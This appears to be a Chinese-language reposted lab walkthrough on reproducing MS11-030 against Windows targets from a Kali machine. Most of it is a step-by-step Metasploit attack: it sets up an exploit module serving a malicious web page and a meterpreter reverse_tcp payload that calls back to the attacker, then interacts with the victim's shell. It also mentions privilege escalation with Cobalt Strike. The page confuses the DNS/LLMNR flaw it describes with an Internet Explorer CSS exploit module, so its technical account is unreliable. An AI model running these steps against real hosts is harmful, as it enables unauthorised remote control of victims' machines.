MS11 您所在的位置:网站首页 searchphp漏洞 MS11

MS11

#MS11| 来源: 网络整理| 查看: 265

 

MS11-030:DNS 解析中的漏洞允许远程代码执行 (2509553)

安装的 Windows DNS 客户端处理链接-本地多播名称解析 (LLMNR) 查询的方法中存在一个缺陷,攻击者可利用此缺陷在 NetworkService 帐户的上下文中执行任意代码。 请注意,Windows XP 和 2003 不支持 LLMNR。要在这些平台上成功利用此漏洞,需要本地访问权限以及运行特殊应用程序的权限。但是,在 Windows Vista、2008、7 和 2008 R2 中,可以远程利用此漏洞。

Microsoft 已发布一系列用于 Windows XP、2003、Vista、2008、7 和 2008 R2 的修补程序。

复现准备

靶机:Win xp,2003,win7,and 2008R2

攻击机:kali

漏洞扫描

使用Nessus进行漏洞扫描,发现主机存在ms11-030漏洞

漏洞利用 

启动msf

msfconsole

选择漏洞利用exp

use exploit/windows/browser/ms11_003_ie_css_import

 查看配置参数

show options

设置生成的恶意网页的URL为baidu.com

为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

设置LHOST以绑定本地IP

运行命令“exploit”或者“run”开始进行攻击,

生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

设置攻击载荷

set payload windows/meterpreter/reverse_tcp

目标用户上线成功,回连攻击机

sessions 列出所有会话 sessions -i 1 进入1号会话 getuid 查看当前用户 shell 进入交换式cmd界面 chcp 65001 乱码编译

 可以看到获取到IP地址

 

建议开启windows更新,开启防火墙。打上对应的补丁包 

(同时可以利用MSF配合CS上线提权)



【本文地址】

公司简介

联系我们

今日新闻

    推荐新闻

    专题文章
      CopyRight 2018-2019 实验室设备网 版权所有